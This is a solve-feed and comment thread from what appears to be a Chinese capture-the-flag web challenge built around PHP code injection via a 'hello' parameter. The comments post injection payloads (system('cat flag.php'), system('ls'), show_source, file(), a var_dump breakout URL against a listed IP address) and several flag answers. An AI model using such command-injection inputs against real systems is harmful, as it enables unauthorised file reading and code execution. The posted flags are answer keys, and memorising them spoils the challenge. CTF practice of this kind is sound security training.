评分(10)
解题动态
九久 攻破了该题 15分钟前
jwz 攻破了该题 2小时前
胡look 攻破了该题 3小时前
MAO 攻破了该题 15小时前
eee5588 攻破了该题 18小时前
zzasas 攻破了该题 20小时前
安藏七月 攻破了该题 21小时前
大宋iu后的 攻破了该题 21小时前
Rx 攻破了该题 1天前
浪鸭 攻破了该题 1天前
千万 攻破了该题 1天前
13246563665 攻破了该题 1天前
18369735915 攻破了该题 1天前
popidojdow 攻破了该题 1天前
GDGZ_CTF 攻破了该题 1天前
纳百川. 攻破了该题 1天前
link7788 攻破了该题 2天前
langzifun 攻破了该题 2天前
小贾小贾 攻破了该题 2天前
评论
wangyihao 2年前
举报
hello=system("cat flag.php")
18092952956 2年前
举报
show_source('flag.php')
BlueL1ght 2年前
举报
system("cat+flag.php")
zhuleixy 2年前
举报
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 2年前
举报
flag{6dd6075616f5943ab53cff237ff1a63b}
maoctf 2年前
举报
flag{b97285ef92aa650fa9223aafc7adc646};
哥哥 2年前
举报
http://114.67.175.224:12290//?hello=file('flag.php')
z03ctfer 2年前
举报
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中
马踏黄河两岸 2年前
举报
../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php
lilifanqian 2年前
举报
flag{4cadd25b49840f0cdb999cdabc86b103}